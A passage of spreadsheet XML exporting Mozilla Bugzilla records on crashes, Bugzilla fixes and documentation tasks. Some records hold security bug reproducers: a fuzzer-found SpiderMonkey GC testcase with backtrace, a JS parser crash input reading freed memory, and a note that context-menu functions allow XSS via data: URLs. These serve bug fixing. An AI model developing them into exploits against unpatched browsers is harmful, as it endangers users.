        </is>
      </c>
      <c r="Q5594" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5594" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5594" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T5594" t="n">
        <v>1</v>
      </c>
      <c r="U5594" t="n">
        <v>0</v>
      </c>
      <c r="V5594" t="n">
        <v>20</v>
      </c>
      <c r="W5594" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-b2ba2be5-fd5e-462e-9aa4-442592170213.
=============================================================
Crashing Thread (0)
Frame 	Module 	Signature 	Source
0 		@0x65a7d2c5 	
1 	xul.dll 	mozilla::widget::AudioSession::OnSessionDisconnectedInternal() 	widget/windows/AudioSession.cpp:428
2 	xul.dll 	mozilla::detail::RunnableMethodImpl&lt;void ( mozilla::AbstractMirror&lt;bool&gt;::*)(void), 1, 0&gt;::Run() 	obj-firefox/dist/include/nsThreadUtils.h:810
3 	xul.dll 	nsThread::ProcessNextEvent(bool, bool*) 	xpcom/threads/nsThread.cpp:1216
4 	xul.dll 	NS_ProcessNextEvent(nsIThread*, bool) 	xpcom/glue/nsThreadUtils.cpp:361
5 	xul.dll 	mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) 	ipc/glue/MessagePump.cpp:124
6 	xul.dll 	mozilla::ipc::MessagePumpForChildProcess::Run(base::MessagePump::Delegate*) 	ipc/glue/MessagePump.cpp:301
7 	xul.dll 	MessageLoop::RunHandler() 	ipc/chromium/src/base/message_loop.cc:225
8 	xul.dll 	MessageLoop::Run() 	ipc/chromium/src/base/message_loop.cc:205
9 	xul.dll 	nsBaseAppShell::Run() 	widget/nsBaseAppShell.cpp:156
10 	xul.dll 	nsAppShell::Run() 	widget/windows/nsAppShell.cpp:262
11 	xul.dll 	XRE_RunAppShell 	toolkit/xre/nsEmbedFunctions.cpp:869
12 	xul.dll 	mozilla::ipc::MessagePumpForChildProcess::Run(base::MessagePump::Delegate*) 	ipc/glue/MessagePump.cpp:269
13 	xul.dll 	MessageLoop::RunHandler() 	ipc/chromium/src/base/message_loop.cc:225
14 	xul.dll 	MessageLoop::Run() 	ipc/chromium/src/base/message_loop.cc:205
15 	xul.dll 	XRE_InitChildProcess 	toolkit/xre/nsEmbedFunctions.cpp:701
16 	firefox.exe 	content_process_main(int, char** const) 	ipc/contentproc/plugin-container.cpp:197
17 	firefox.exe 	wmain 	toolkit/xre/nsWindowsWMain.cpp:115
18 	firefox.exe 	__scrt_common_main_seh 	f:/dd/vctools/crt/vcstartup/src/startup/exe_common.inl:253
19 	kernel32.dll 	BaseThreadInitThunk 	
20 	ntdll.dll 	__RtlUserThreadStart 	
21 	ntdll.dll 	_RtlUserThreadStart
this crash signature has been present in older builds for a while, but it seems to have sprung up again on 52.0b and subsequent beta builds in 32bit builds on windows 7. 
so maybe there's a clue in the pushlog link for changes between beta 1 &amp; beta 2: https://hg.mozilla.org/releases/mozilla-beta/pushloghtml?fromchange=FIREFOX_52_0b1_RELEASE&amp;tochange=FIREFOX_52_0b2_RELEASE</t>
        </is>
      </c>
      <c r="X5594" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5595">
      <c r="A5595" t="n">
        <v>1841682</v>
      </c>
      <c r="B5595" t="inlineStr">
        <is>
          <t>2023-07-04 12:25:29 -0700</t>
        </is>
      </c>
      <c r="C5595" t="inlineStr">
        <is>
          <t>Assertion failure: this-&gt;flags() == 0, at gc/Cell.h:832</t>
        </is>
      </c>
      <c r="D5595" t="inlineStr">
        <is>
          <t>2024-09-14 05:25:46 -0700</t>
        </is>
      </c>
      <c r="E5595" t="n">
        <v>1</v>
      </c>
      <c r="F5595" t="n">
        <v>1</v>
      </c>
      <c r="G5595" t="n">
        <v>3</v>
      </c>
      <c r="H5595" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5595" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5595" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K5595" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5595" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5595" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5595" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5595" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5595" t="inlineStr">
        <is>
          <t>[bugmon:update,bisected,confirmed][adv-main116+r][adv-ESR115.1+r]</t>
        </is>
      </c>
      <c r="Q5595" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5595" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5595" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T5595" t="n">
        <v>1</v>
      </c>
      <c r="U5595" t="n">
        <v>0</v>
      </c>
      <c r="V5595" t="n">
        <v>33</v>
      </c>
      <c r="W5595" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 20230629-c93a9e0ad90d (debug build, run with --fuzzing-safe --cpu-count=2 --ion-offthread-compile=off --ion-warmup-threshold=0 --fast-warmup --blinterp-warmup-threshold=1):
    gczeal(12,9);
    function clone_object_check(b, desc) {
      function ownProperties(obj) {
        return Object.getOwnPropertyNames(obj).
          map(function (p) { return [p, Object.getOwnPropertyDescriptor(obj, p)]; });
      }
      function isArrayLength(obj, pair) {
        return Array.isArray(obj) &amp;&amp; pair[0] == "length";
      }
      function isCloneable(obj, pair) {
        return isArrayLength(obj, pair) || (typeof pair[0] === 'string' &amp;&amp; pair[1].enumerable);
      }
      function assertIsCloneOf(a, b, path) {
        var pb = ownProperties(b).filter(function(element) {
          return isCloneable(b, element);
        });
        var pa = ownProperties(a);
        for (var i = 0; i &lt; pa.length; i++) {
          var da = pa[i][1];
          var va = da.value;
          var vb = b[pb[i][0]];
          queue.push([va, vb]);
        }
      }
      var a = deserialize(serialize(b));
      var queue = [[a, b]];
      while (queue.length) {
        var triple = queue.shift();
        assertIsCloneOf(triple[0], triple[1], triple[2]);
      }
    }
    gczeal(19, 5);
    var allTypedArraySamples = [
        { value: new Int8Array(1), expected: true },
        { value: new Uint8ClampedArray(1), expected: true }
    ];
    clone_object_check(allTypedArraySamples);
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  0x00005555577bed3d in CheckForCompartmentMismatch(JSObject*, JSObject*) ()
    #1  0x00005555577a48e7 in bool js::GCMarker::processMarkStackTop&lt;4u&gt;(js::SliceBudget&amp;) ()
    #2  0x000055555779ee02 in bool js::GCMarker::doMarking&lt;4u&gt;(js::SliceBudget&amp;, js::gc::ShouldReportMarkTime) ()
    #3  0x000055555779ec8a in js::GCMarker::markUntilBudgetExhausted(js::SliceBudget&amp;, js::gc::ShouldReportMarkTime) ()
    #4  0x0000555557757d4a in js::gc::GCRuntime::markUntilBudgetExhausted(js::SliceBudget&amp;, js::gc::GCRuntime::ParallelMarking, js::gc::ShouldReportMarkTime) ()
    #5  0x000055555775c1b4 in js::gc::GCRuntime::incrementalSlice(js::SliceBudget&amp;, JS::GCReason, bool) ()
    #6  0x000055555775faae in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget const&amp;, JS::GCReason) ()
    #7  0x0000555557761434 in js::gc::GCRuntime::collect(bool, js::SliceBudget const&amp;, JS::GCReason) ()
    #8  0x0000555557729e16 in js::gc::GCRuntime::runDebugGC() ()
    #9  0x000055555772848c in bool js::gc::CellAllocator::PreAllocChecks&lt;(js::AllowGC)1&gt;(JS::RootingContext*, js::gc::AllocKind) ()
    #10 0x00005555577293a5 in void* js::gc::CellAllocator::AllocTenuredCell&lt;(js::AllowGC)1&gt;(JS::RootingContext*, js::gc::AllocKind, unsigned long) ()
    #11 0x00005555571bf6e8 in js::SharedShape::getInitialShape(JSContext*, JSClass const*, JS::Realm*, js::TaggedProto, unsigned long, js::EnumFlags&lt;js::ObjectFlag&gt;) ()
    #12 0x0000555556fff4b9 in NewObject(JSContext*, JSClass const*, JS::Handle&lt;js::TaggedProto&gt;, js::gc::AllocKind, js::NewObjectKind) ()
    #13 0x0000555556fff836 in js::NewObjectWithClassProto(JSContext*, JSClass const*, JS::Handle&lt;JSObject*&gt;, js::gc::AllocKind, js::NewObjectKind) ()
    #14 0x0000555556e427e7 in js::BooleanObject::create(JSContext*, bool, JS::Handle&lt;JSObject*&gt;) ()
    #15 0x0000555556ea630c in obj_getOwnPropertyNames(JSContext*, unsigned int, JS::Value*) ()
    #16 0x000001ffb972374e in ?? ()
    #17 0x0000000000000000 in ?? ()
    rax	0x5555557edf6f	93824994959215
    rbx	0x3ed9ec000198	69105688248728
    rcx	0x5555585b1378	93825042944888
    rdx	0x0	0
    rsi	0x7ffff7105770	140737338431344
    rdi	0x7ffff7104540	140737338426688
    rbp	0x7fffffffbe40	140737488338496
    rsp	0x7fffffffbe20	140737488338464
    r8	0x7ffff7105770	140737338431344
    r9	0x7ffff7f9a840	140737353721920
    r10	0x2	2
    r11	0x0	0
    r12	0x1	1
    r13	0x7ffff3e3b080	140737285173376
    r14	0x2	2
    r15	0x7ffff39c5f20	140737280499488
    rip	0x5555577bed3d &lt;CheckForCompartmentMismatch(JSObject*, JSObject*)+237&gt;
    =&gt; 0x5555577bed3d &lt;_ZL27CheckForCompartmentMismatchP8JSObjectS0_+237&gt;:	movl   $0x340,0x0
       0x5555577bed48 &lt;_ZL27CheckForCompartmentMismatchP8JSObjectS0_+248&gt;:	callq  0x555556cac07f &lt;abort&gt;
Marking s-s due to GC assert.</t>
        </is>
      </c>
      <c r="X5595" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5596">
      <c r="A5596" t="n">
        <v>173721</v>
      </c>
      <c r="B5596" t="inlineStr">
        <is>
          <t>2002-10-10 06:18:07 -0700</t>
        </is>
      </c>
      <c r="C5596" t="inlineStr">
        <is>
          <t>report.cgi needs to re-catch $SIG{TERM}</t>
        </is>
      </c>
      <c r="D5596" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:33 -0800</t>
        </is>
      </c>
      <c r="E5596" t="n">
        <v>1</v>
      </c>
      <c r="F5596" t="n">
        <v>1</v>
      </c>
      <c r="G5596" t="n">
        <v>4</v>
      </c>
      <c r="H5596" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5596" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5596" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K5596" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5596" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5596" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5596" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5596" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5596" t="inlineStr"/>
      <c r="Q5596" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5596" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5596" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5596" t="n">
        <v>1</v>
      </c>
      <c r="U5596" t="n">
        <v>0</v>
      </c>
      <c r="V5596" t="n">
        <v>3</v>
      </c>
      <c r="W5596" t="inlineStr">
        <is>
          <t>Similarly to buglist.cgi, we do want reports to be interruptable.
You need to:
# XXX - mod_perl
$::SIG{TERM} = 'DEFAULT';
$::SIG{PIPE} = 'DEFAULT';
at the top of the script. (Include the comment so that we remember to go through
this later.)</t>
        </is>
      </c>
      <c r="X5596" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5597">
      <c r="A5597" t="n">
        <v>1624716</v>
      </c>
      <c r="B5597" t="inlineStr">
        <is>
          <t>2020-03-24 14:14:44 -0700</t>
        </is>
      </c>
      <c r="C5597" t="inlineStr">
        <is>
          <t>Update Lockwise alerts SUMO page to add info on vulnerable logins</t>
        </is>
      </c>
      <c r="D5597" t="inlineStr">
        <is>
          <t>2020-04-29 12:14:58 -0700</t>
        </is>
      </c>
      <c r="E5597" t="n">
        <v>1</v>
      </c>
      <c r="F5597" t="n">
        <v>1</v>
      </c>
      <c r="G5597" t="n">
        <v>5</v>
      </c>
      <c r="H5597" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5597" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5597" t="inlineStr">
        <is>
          <t>Knowledge Base Content</t>
        </is>
      </c>
      <c r="K5597" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5597" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5597" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5597" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5597" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5597" t="inlineStr"/>
      <c r="Q5597" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5597" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5597" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5597" t="n">
        <v>1</v>
      </c>
      <c r="U5597" t="n">
        <v>0</v>
      </c>
      <c r="V5597" t="n">
        <v>8</v>
      </c>
      <c r="W5597" t="inlineStr">
        <is>
          <t>We will need to create a page on SUMO that can give some background on vulnerable logins in Firefox Lockwise.
Vulnerable logins are defined as a login that shares a password with a breached login in the same Firefox profile. Just as we ask a user to change their password for a website that gets breached, if that password is shared with other logins then we will ask the user to change their password on the other sites too.
This page will be linked to from within Firefox Lockwise in the "vulnerable passwords" notification.</t>
        </is>
      </c>
      <c r="X5597" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5598">
      <c r="A5598" t="n">
        <v>701780</v>
      </c>
      <c r="B5598" t="inlineStr">
        <is>
          <t>2011-11-11 10:48:48 -0800</t>
        </is>
      </c>
      <c r="C5598" t="inlineStr">
        <is>
          <t>Question mark icon in the Dashboard does not display any information</t>
        </is>
      </c>
      <c r="D5598" t="inlineStr">
        <is>
          <t>2011-12-01 17:20:03 -0800</t>
        </is>
      </c>
      <c r="E5598" t="n">
        <v>1</v>
      </c>
      <c r="F5598" t="n">
        <v>1</v>
      </c>
      <c r="G5598" t="n">
        <v>5</v>
      </c>
      <c r="H5598" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5598" t="inlineStr">
        <is>
          <t>Web Apps</t>
        </is>
      </c>
      <c r="J5598" t="inlineStr">
        <is>
          <t>Dashboard</t>
        </is>
      </c>
      <c r="K5598" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5598" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5598" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5598" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5598" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5598" t="inlineStr"/>
      <c r="Q5598" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5598" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5598" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5598" t="n">
        <v>1</v>
      </c>
      <c r="U5598" t="n">
        <v>0</v>
      </c>
      <c r="V5598" t="n">
        <v>3</v>
      </c>
      <c r="W5598" t="inlineStr">
        <is>
          <t>Build identifier: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0
The question mark icon in the Dashboard does not do anything or display any information. 
Steps to Reproduce:
1. Launch Firefox
2. Install the apps extension - Can be found at http://people.mozilla.com/~mdabbagh/openwebapps/extension/
3. Either click on the 'Apps' icon in the Add-on bar or go to myapps.mozillalabs.com
4. Try to click/hover mouse over the question mark
Actual Results:
Nothing occurs.
Expected Results:
Information is shown regarding the use of the Dashboard such as how to arrange the apps and how to delete apps as well.</t>
        </is>
      </c>
      <c r="X5598" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5599">
      <c r="A5599" t="n">
        <v>734076</v>
      </c>
      <c r="B5599" t="inlineStr">
        <is>
          <t>2012-03-08 07:25:37 -0800</t>
        </is>
      </c>
      <c r="C5599" t="inlineStr">
        <is>
          <t>XSS with context menu</t>
        </is>
      </c>
      <c r="D5599" t="inlineStr">
        <is>
          <t>2012-12-01 06:32:06 -0800</t>
        </is>
      </c>
      <c r="E5599" t="n">
        <v>1</v>
      </c>
      <c r="F5599" t="n">
        <v>1</v>
      </c>
      <c r="G5599" t="n">
        <v>2</v>
      </c>
      <c r="H5599" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5599" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5599" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5599" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5599" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5599" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5599" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5599" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5599" t="inlineStr">
        <is>
          <t>[sg:high][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5599" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5599" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5599" t="inlineStr">
        <is>
          <t>Firefox 15</t>
        </is>
      </c>
      <c r="T5599" t="n">
        <v>1</v>
      </c>
      <c r="U5599" t="n">
        <v>0</v>
      </c>
      <c r="V5599" t="n">
        <v>74</v>
      </c>
      <c r="W5599" t="inlineStr">
        <is>
          <t>http://mxr.mozilla.org/mozilla-central/source/browser/base/content/nsContextMenu.js
showOnlyThisFrame, viewMedia and viewBGImage disallow javascript: url but allow data: url.  Thus, it's possible to perform an XSS attack using data: url.</t>
        </is>
      </c>
      <c r="X5599" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5600">
      <c r="A5600" t="n">
        <v>874344</v>
      </c>
      <c r="B5600" t="inlineStr">
        <is>
          <t>2013-05-21 01:10:55 -0700</t>
        </is>
      </c>
      <c r="C5600" t="inlineStr">
        <is>
          <t>Update testNewTab.js to handle the Australis build properly</t>
        </is>
      </c>
      <c r="D5600" t="inlineStr">
        <is>
          <t>2019-07-03 12:10:43 -0700</t>
        </is>
      </c>
      <c r="E5600" t="n">
        <v>1</v>
      </c>
      <c r="F5600" t="n">
        <v>1</v>
      </c>
      <c r="G5600" t="n">
        <v>6</v>
      </c>
      <c r="H5600" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5600" t="inlineStr">
        <is>
          <t>Mozilla QA Graveyard</t>
        </is>
      </c>
      <c r="J5600" t="inlineStr">
        <is>
          <t>Mozmill Tests</t>
        </is>
      </c>
      <c r="K5600" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5600" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5600" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5600" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5600" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5600" t="inlineStr">
        <is>
          <t>[mozmill-test-failure][australis][sprint2013-38]</t>
        </is>
      </c>
      <c r="Q5600" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5600" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5600" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5600" t="n">
        <v>1</v>
      </c>
      <c r="U5600" t="n">
        <v>0</v>
      </c>
      <c r="V5600" t="n">
        <v>25</v>
      </c>
      <c r="W5600" t="inlineStr">
        <is>
          <t>This failure reproduces only on Windows:
http://mozmill-crowd.blargon7.com/#/functional/report/14f8bc4e22e61353662cded4c2f27d00
It is due to a lookup expression and fails here http://hg.mozilla.org/qa/mozmill-tests/file/05730582186d/lib/tabs.js#l284</t>
        </is>
      </c>
      <c r="X5600" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5601">
      <c r="A5601" t="n">
        <v>533515</v>
      </c>
      <c r="B5601" t="inlineStr">
        <is>
          <t>2009-12-08 10:55:41 -0800</t>
        </is>
      </c>
      <c r="C5601" t="inlineStr">
        <is>
          <t>When submitting attachment to existing bug "Undefined subroutine &amp;Bugzilla::BugMail::editable_bug_fields" error gets thrown. Emails do not get send.</t>
        </is>
      </c>
      <c r="D5601" t="inlineStr">
        <is>
          <t>2010-01-06 14:07:07 -0800</t>
        </is>
      </c>
      <c r="E5601" t="n">
        <v>1</v>
      </c>
      <c r="F5601" t="n">
        <v>1</v>
      </c>
      <c r="G5601" t="n">
        <v>4</v>
      </c>
      <c r="H5601" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5601" t="inlineStr">
        <is>
          <t>Testopia</t>
        </is>
      </c>
      <c r="J5601" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5601" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="L5601" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5601" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5601" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5601" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5601" t="inlineStr"/>
      <c r="Q5601" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5601" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5601" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5601" t="n">
        <v>1</v>
      </c>
      <c r="U5601" t="n">
        <v>1</v>
      </c>
      <c r="V5601" t="n">
        <v>18</v>
      </c>
      <c r="W5601" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.2; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Build Identifier: Bugzilla 3.4.3/3.4.4 &amp; Testopia 2.3
When submitting an attachment to an existing bug the following error gets thrown:
Bugzilla has suffered an internal error. Please save this page and send it to myemail@mail.com with details of what you were doing at the time this message appeared.
URL: http://10.100.0.225/attachment.cgi
undef error - Undefined subroutine &amp;Bugzilla::BugMail::editable_bug_fields called at Bugzilla/BugMail.pm line 132, &lt;fh00001install.log&gt; line 1. 
Submitted file name in erorr example: install.log.
Additional Info:
Attachment gets actually saved OK.
No error gets thrown when I create a new bug with or without an attachment. The error gets thrown only when submitting attachment for an existing bug. 
This happens right after installing Testopia 2.3 over Bugzilla 3.4.3+. Without Testopia there is no error observed.
Tested against 3.4.3 and 3.4.4 versions of Bugzilla with Testopia 2.3.
Reproducible: Always
Steps to Reproduce:
1. Sumbmit attachmet for existing bug/ticket &gt; error gets thrown.</t>
        </is>
      </c>
      <c r="X5601" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5602">
      <c r="A5602" t="n">
        <v>498309</v>
      </c>
      <c r="B5602" t="inlineStr">
        <is>
          <t>2009-06-15 03:59:29 -0700</t>
        </is>
      </c>
      <c r="C5602" t="inlineStr">
        <is>
          <t>Calling get_text in quoteUrls over and over is very slow (show_bug.cgi page with many comments is slow)</t>
        </is>
      </c>
      <c r="D5602" t="inlineStr">
        <is>
          <t>2010-03-13 16:37:07 -0800</t>
        </is>
      </c>
      <c r="E5602" t="n">
        <v>1</v>
      </c>
      <c r="F5602" t="n">
        <v>1</v>
      </c>
      <c r="G5602" t="n">
        <v>4</v>
      </c>
      <c r="H5602" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5602" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5602" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K5602" t="inlineStr">
        <is>
          <t>3.0</t>
        </is>
      </c>
      <c r="L5602" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5602" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5602" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5602" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5602" t="inlineStr"/>
      <c r="Q5602" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5602" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5602" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T5602" t="n">
        <v>1</v>
      </c>
      <c r="U5602" t="n">
        <v>0</v>
      </c>
      <c r="V5602" t="n">
        <v>53</v>
      </c>
      <c r="W5602" t="inlineStr">
        <is>
          <t>Created attachment 383235
Patch
quoteUrls is a filter, which means that its run for each comment. One of the things that is done per comment is to call |get_text('term', { term =&gt; 'bug' })| to match 'bug 12345' type comments.
This is slow for a number of reasons - not only do we have to call a template, but get_text uses messages.html.tmpl, which loads field-descs.none.tmpl, which calls into the DB to get the fields, and then loops over each field. For each comment.
There are a number of issues with this, but the simplest fix is to cache the term (per language, even though in this case its not needed)
timing for 10 runs of |do 'show_bug.cgi'; $Bugzilla::_request_cache = {};|, on a bug with 57 comments, when not logged in, redirecting output to /dev/null, with one extra run before hand to load all the modules:
trunk: 15 s
with cache: 9.93s
with different template: 10.24s
with cache + different template: 9.77s
(times +/- 0.1s)
FWIW:
removing setting field_descs/bug_fields from field-descs.none.tmpl: 6.0 s
removing ... with this patch: 5.7s
but that's a separate bug....
(bug 915 has 311 comments, and takes 14 seconds to load for me, about 11 of which is before any response)
I thought about doing this with get_text directly, but some of that may need the fields (importxml uses it). Most get_text users are in checksetup where the actual DB changes will take all the time, so its not a big issue.
this bug dates back to 3.0, although I've only tested with trunk.</t>
        </is>
      </c>
      <c r="X5602" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5603">
      <c r="A5603" t="n">
        <v>352271</v>
      </c>
      <c r="B5603" t="inlineStr">
        <is>
          <t>2006-09-11 21:05:03 -0700</t>
        </is>
      </c>
      <c r="C5603" t="inlineStr">
        <is>
          <t>Crash dereferencing 0xdadadada [@ ReportCompileErrorNumber] called from CheckDestructuring</t>
        </is>
      </c>
      <c r="D5603" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:44 -0700</t>
        </is>
      </c>
      <c r="E5603" t="n">
        <v>1</v>
      </c>
      <c r="F5603" t="n">
        <v>1</v>
      </c>
      <c r="G5603" t="n">
        <v>3</v>
      </c>
      <c r="H5603" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5603" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5603" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5603" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5603" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5603" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5603" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5603" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5603" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5603" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5603" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5603" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T5603" t="n">
        <v>1</v>
      </c>
      <c r="U5603" t="n">
        <v>0</v>
      </c>
      <c r="V5603" t="n">
        <v>17</v>
      </c>
      <c r="W5603" t="inlineStr">
        <is>
          <t>js&gt; [window.x getter= t for each ([*].a(v) in [])]
Segmentation fault
js&gt; [window.x getter= t for each ([*].a(v)
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0xdadadb66
0x0007f3b4 in ReportCompileErrorNumber (cx=0x600180, handle=0x1814b00, flags=512, errorNumber=102, report=0xbfffdaa4, charArgs=1, ap=0xbfffdb18 "???h") at jsscan.c:571
571         JS_ASSERT(!ts || ts-&gt;linebuf.limit &lt; ts-&gt;linebuf.base + JS_LINE_LIMIT);
(gdb) bt
